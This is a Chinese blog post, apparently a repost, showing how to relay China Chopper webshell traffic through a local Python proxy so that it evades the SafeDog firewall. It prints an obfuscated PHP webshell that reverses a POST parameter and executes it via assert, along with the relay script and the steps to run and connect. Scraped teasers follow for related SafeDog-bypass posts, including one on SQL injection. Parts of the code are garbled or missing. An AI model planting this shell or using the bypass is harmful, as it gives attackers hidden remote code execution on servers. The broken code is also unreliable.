中轉Webshell 繞過安全狗(二)

2022-04-02 23:15:17 字數 2477 閱讀 4429

前言

在實踐中轉webshell繞過安全狗(一)中,在服務端和客戶端均為php。某大佬提示並分享資源後,打算使用python完成中轉。部分**無恥copy。

本地127.0.0.1,安裝python2

phpshellproxy.py

#coding=utf-8

import sys

reload(sys)

sys.setdefaultencoding('utf-8')

import web

urls = (

'/','index',

'/reverse','reverse',

)#render = web.template.render('templates/')

import json

import urllib

class index:

def get(self):

return 1

class base:

def getpostdata(self, postdata):

#content with &

postdatalist = postdata.split('&')

for pa in postdatalist:

#content with =, can't split with =

index = pa.find("=")

setattr(self,pa[:index],urllib.unquote_plus(pa[index+1:]))

import requests

import codecs, urllib , base64 #, chardet

class reverse(base, object):

def get(self,corpid):

return 1

def post(self):

data = web.data()

#print data

pwdata = data.split('&')[0].split('=')[1]

#print pwdata

#print 'pwdata', pwdata

#print 'pwdata[::-1]', urllib.unquote(urllib.unquote(pwdata.replace('+',' '))[::-1]).replace('&','%26').replace('+','%2b')

newpostdata = data.replace(pwdata, urllib.unquote(urllib.unquote(pwdata.replace('+',' '))[::-1]).replace('&','%26').replace('+','%2b'))

#print 'newpostdata', newpostdata

#r.encoding = 'gb2312'

#print chardet.detect(r.content)

#print r.text

#return r.text

return r.content

if __name__ == "__main__":

執行需要安裝

pip install web

pip install requests

服務端shell端192.168.253.129,安裝安全狗

reverse.php

做了點混淆,可過安全狗

<?php 

$ds = $_post['x'];

$str = strrev($ds);

$a1 = array("1234","123456");

$a2 = array($str,"5461");

$ma = array_map(null,$a1,$a2)[0][1];

@assert($ma);

替換phpshellproxy.py中的shell位址,需配合reverse.php使用

執行python phpshellproxy.py 9000 (埠自定義)

使用選單連線對應shell位址,如 http://[ip]:9000/reverse ,輸入對應密碼,配置對應指令碼型別,如果開啟錯誤,建議清掉快取,重新開啟。

本地執行phpshellproxy.py檔案

中國菜刀進行連線  密碼

中轉Webshell 繞過安全狗(一)

前言 聽說中國菜刀裡有後門。抓包我是沒有監測到異常資料報。為了以防萬一,且更好使用中國菜刀硬槓安全狗。筆者收集了一下資料。無恥的copy大佬的原始碼,只是在大佬的基礎上簡單修改了一下,達到webshell繞過安全狗。原理 菜刀不直接向shell傳送資料,而是傳送到中轉的乙個頁面上,這個頁面對接收的引...

中轉Webshell 繞過安全狗(一)

前言 聽說中國菜刀裡有後門。抓包我是沒有監測到異常資料報。為了以防萬一,且更好使用中國菜刀硬槓安全狗。筆者收集了一下資料。無恥的copy大佬的原始碼,只是在大佬的基礎上簡單修改了一下,達到webshell繞過安全狗。原理 菜刀不直接向shell傳送資料,而是傳送到中轉的乙個頁面上,這個頁面對接收的引...

繞安全狗mysql Mysql注入繞過安全狗

mysql注入繞過安全狗 sql注入閉合檢查 sql注入的分類有很多種分法 可以分成數字型和字元型,區別在於是否需要完整閉合。本題中由於我經驗不足,試了好久才想到就是簡單的雙引號加括號就可以閉合了,然後再注釋掉後面的內容。單引號 回顯正常結果 雙引號錯誤回顯 這裡其實可以簡單分析一下,1 是get請...